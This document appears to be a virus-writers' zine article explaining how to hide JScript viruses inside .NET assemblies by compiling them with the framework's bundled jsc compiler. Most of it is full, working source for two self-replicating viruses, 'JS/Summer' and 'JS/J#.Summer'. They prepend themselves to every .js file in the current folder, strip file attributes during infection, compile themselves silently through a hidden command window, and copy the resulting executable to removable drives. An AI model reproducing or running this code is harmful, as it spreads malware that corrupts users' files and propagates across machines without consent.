                                 Hidden in .NET
                                       by
                                      hh86



.NET Compilers

Microsoft  decided  to include compilers along with the  .NET framework  that is
available pretty much in every computer of the world running Windows.  Compilers
include one  for JScript .NET.  So, we can compile our JScript virus source into
.NET assembly.  Imagine you have polymorphic JScript virus, it is transformed to
MSIL code, what is the result? One great .NET assembly that looks very different
than  previous one, so in each computer you can generate multiple polymorphic or
even more complex instances of the virus running and spreading as exe file.

This is much more powerful technique than using JS2EXE tools.  ;)  Since now you
can infect files and recompile yourself!


How hidden?

Source code  will  be  encoded as UTF-16LE  string (no BOM present because every
string  is  stored  in  this  format).  They are stored in the MetaData section.
When running, it will use the VSA Engine to run our script.   This looks like an
easy way to host and run the script, however, this gets as complex as the source
code is.   One of the  problems  for me was to make a JScript file infector, how
was I going to retrieve my source code? After some examination I found this, and
I knew reflections must be available.   JScript always had its reflection system
(in part, because  of the Function() object, we can create a function to be in a
variable), so we don't need to open our own file and get the code, really. 


How we do it

We just need access to .NET Framework directory "Microsoft .NET\Framework".  The
detail here is there will be multiple versions of the framework.  I choose to go
using the last one, 4.0.

Here is my virus JS/Summer, *must* be single-line, run carefully:  it spreads to
fixed drives if possible.

g();function g(){;f=new ActiveXObject("Scripting.FileSystemObject");n=f.GetSpecialFolder(0)+"\\Microsoft.NET\\Framework\\v4.0.30319\\";c="g();"+g;v="v=[]";for(i=0;i<c.length;i++){v=v+";v.push(\"\\x"+c.substr(i,1).charCodeAt(0).toString(16)+"\")"}v=v+c.substr(17,51)+"s=f.CreateTextFile(\"v.js\",2);v=v.join(\"\");s.Write(v);s.Close()";for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext()){x=y.item();if(f.GetExtensionName(x).toLowerCase()=="js"){try{b=f.OpenTextFile(x);k=b.Read(4);if(k!=c.substr(0,4)){h=b.ReadAll();b.Close();p=x.Attributes;x.Attributes=0;l=f.CreateTextFile(x);l.Write(c+";"+k+h);l.Close();x.Attributes=p}}catch(e){}}}s=f.CreateTextFile(n+"v",2);s.Write(v);s.Close();w=new ActiveXObject("WScript.Shell").Run("cmd /k cd "+n+"&jsc /t:winexe /fast- v&exit",0,1);for(y=new Enumerator(f.Drives);!y.atEnd();y.moveNext()){u=y.item();if(u.DriveType==1){v="v.exe";f.CopyFile(n+v,u+"\\"+v)}}}


JS .NET virus

I thought to make an interesting cross-infector.    However, we cannot know when
file is  certainly  JScript or JScript .NET.  Known bug is we cannot include the
"import System;import System.IO" we require for JScript .NET.  :(

Here is though, JS/J#.Summer:

g();function g()
{

    /*access source code in #US when in .NET assembly*/

    var u="g();"+g+"\r\n";

    try
    {
        s=GC                                 //but it was a trick and the clock struck 12
    }
    catch(e)
    {
        var f=new ActiveXObject("Scripting.FileSystemObject");
        for(y=new Enumerator(f.getfolder(".").files);!y.atEnd();y.moveNext())
        {
            var x=y.item();
            if(f.GetExtensionName(x).toLowerCase()=="js")
            {
                try
                {
                    var b=f.OpenTextFile(x);var h=b.ReadAll();b.Close();
                    if(h.substr(0,4)!="g();")
                    {
                        var p=x.Attributes;x.Attributes=0;var l=f.CreateTextFile(x);l.Write(u+h);l.Close();x.Attributes=p
                    }
                }
                catch(e)
                {}
            }
        }
        return
    }

    /*MSIL code now*/
    var w,s=Object();
    var y=Directory.GetFiles(Directory.GetCurrentDirectory(),"*.js");
    for(var x in y)
    {
        x=y[x].ToString();
        try
        {
            s=new StreamReader(x);var c=s.ReadToEnd();s.Close();
            if(c.substr(0,4)!="g();")
            {
                var a=File.GetAttributes(x);File.SetAttributes(x,0);w=new StreamWriter(x);w.Write(u+c);w.Close();File.SetAttributes(x,a)
            }
        }
        catch(e)
        {}
    }
}